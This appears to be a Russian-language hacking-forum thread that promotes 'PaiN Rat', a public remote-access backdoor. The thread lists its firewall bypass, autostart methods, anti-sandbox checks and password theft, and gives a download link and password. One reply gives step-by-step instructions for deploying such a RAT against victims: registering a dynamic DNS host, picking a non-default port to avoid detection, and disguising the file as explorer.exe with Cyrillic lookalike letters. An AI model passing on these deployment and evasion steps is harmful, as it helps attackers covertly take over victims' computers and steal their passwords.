• XSS.stack #1 – первый литературный журнал от юзеров форума

PaiN Rat

Winux

Старожил форума
Легенда
Реакции
53
PaiN Rat 0.1 Beta 9
Новый паблик-бэкдор.
Основные особенности:
----------
- Обход фаеров (DLL Injection, ДЛЛ не пишется на хард)
- Шифрование трафика
- 4 метода автозагрузки (Shell, Policies, ActiveX, UserInIt)
- Встроенный Binder
- Многопоточная передача
- Антиотладка (Anti VMware, VirtualPC, Anubis Sandbox..etc)

Кроме того огромная коллекция бэкдорных функций, отправка паролей.
Пока не совместима с вистой.

Release date: 2008-08-06

Пасс:
HackTheDarkness.com

[New$paN]
:screenshot: Скриншот|Screenshot
:zns5: Скачать|Download
:zns2: Домашняя страница программы

jet92
если винукс не хочет чтобы дауны юзали, просто удали мой пост.
Какого вы высого мнения о себе, товарищь ;)
можно ссылку на Poison Ivy гуглил его, не нашел. буду благодарен.
http://www.google.ru/search?hl=ru&q=poisonivy самый первый линк

jet92
если винукс не хочет чтобы дауны юзали, просто удали мой пост.
он про это :fie: keep 0day priv8

egor084
no-ip.com , там зарегестрироваться,зарегать домен (там же,бесплатно),поставить их клиент у себя на компе,домен который ты зарегал - будет твой IP.
Теперь билдим SynRat или еще что с аналогичной системой коннекта.
Порт - указываем свободный порт, желательно не по дефолту который там т.к жертва может спалить что у нее бекдор,зная что Synrat коннектится на этот порт и сразу поймет.Ставим порт другой.Незнаю,есть там автозагрузка,нету,по идее,должна быть.Ставишь автозагрузку,указываешь имя сервиса,потом указываешь где твой сервер будет храниться,можно в папке \WINDOWS\ с названием explorer.exe - где e руссий аналог e,х - русская х и тд,вот скопируй допустим название (без ковычек) "ехplоrеr.exe",так сложнее спалить.
И самое главное,указываешь в DNS или что там,HOST,свой домен который зарегал,открываешь No-ip смотришь чтоб он был активен,т.к там горела такая улыбающаяся рожица.
Сервер настроили.(незнаю какие там еще фичи есть,ставь галки на нужных опциях,если непонимаешь по англ -> translate.google.com).
Клиент - указываешь какой порт прослушивать (указать порт,который ты указал при создании сервера.) Если при создании сервера указывал пароль (что-бы хз кто похекав твой гейт не забрал твоих ботов),указываешь в клиенте пароль.Все,запускаешь бекдор - он коннектится к тебе.Вроде все понятно должно быть.

это не сплойты каторые с моды выходят...такие вещи астаюцца актуальными вечно...успевай толька критавать...я бывает даже хкантролам пользуюсь инакда=)0 :baby: :baby:

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх